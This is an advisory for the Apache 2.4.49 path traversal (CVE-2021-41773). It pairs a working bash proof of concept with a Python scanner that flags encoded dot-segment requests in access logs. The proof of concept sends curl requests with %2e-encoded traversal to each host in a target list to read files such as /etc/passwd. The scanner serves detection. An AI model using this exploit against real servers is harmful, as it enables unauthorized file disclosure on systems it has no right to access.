Apache HTTP Server version 2.4.49 suffers from a path traversal vulnerability.
advisories | CVE-2021-41773
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.49
# Tested on: 2.4.49
# CVE : CVE-2021-41773
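# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash
# Both arguments are required: a file of target base URLs and the file path to request.
if [[ $1 == '' ]] || [[ $2 == '' ]]; then
echo "Set [TARGET-LIST.TXT] [PATH]"
echo ./PoC.sh targets.txt /etc/passwd
exit
fi
# --path-as-is stops curl from normalizing the dot segments before the request is sent.
for host in $(cat "$1"); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done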
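For defenders, the request shape above leaves a recognizable trace in access logs: dot segments written as %2e. The following is an added detection example, not part of the original PoC; the names verdict, scan and SAMPLE are hypothetical, the log lines are constructed, and it assumes the access log records the raw request line (Apache's `%r`).

```python
import re
from urllib.parse import unquote

# Apache common/combined log line: client ... "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) [^"]*" (\d{3}) ')

def verdict(target):
    """Classify a raw (still percent-encoded) request target."""
    depth, encoded_dots, escaped = 0, False, False
    for raw in target.split('?', 1)[0].split('/'):   # path only, no query
        seg = unquote(raw)                # a single decoding pass
        if seg in ('.', '..') and '%' in raw:
            encoded_dots = True           # dot segment hidden behind %2e / %2E
        if seg == '..':
            depth -= 1
        elif seg not in ('', '.'):
            depth += 1
        escaped = escaped or depth < 0    # climbed above the URL root
    if not encoded_dots:
        return 'no-encoded-dots'          # literal ../ is out of scope here
    return 'escapes-root' if escaped else 'encoded-dots'

def scan(lines):
    """Return (client, status, verdict, target) for every flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        v = verdict(target)
        if v != 'no-encoded-dots':
            hits.append((client, int(status), v, target))
    return hits

# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    '192.0.2.10 - - [05/Oct/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043',
    '198.51.100.7 - - [05/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1820',
    '198.51.100.7 - - [05/Oct/2021:10:00:03 +0000] "GET /cgi-bin/.%2E/%2E%2E/etc/hosts HTTP/1.1" 403 199',
    '192.0.2.22 - - [05/Oct/2021:10:00:04 +0000] "GET /docs/v1/%2e%2e/v2/index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Oct/2021:10:00:05 +0000] "GET /search?q=%2e%2e/ HTTP/1.1" 200 88',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE):
        print(*hit)
```

A 200 status on an `escapes-root` hit is the case to investigate first. Because `/cgi-bin/` is normally an alias to a directory outside the document root, an `encoded-dots` hit under an aliased path also deserves review even though it never climbs above the URL root.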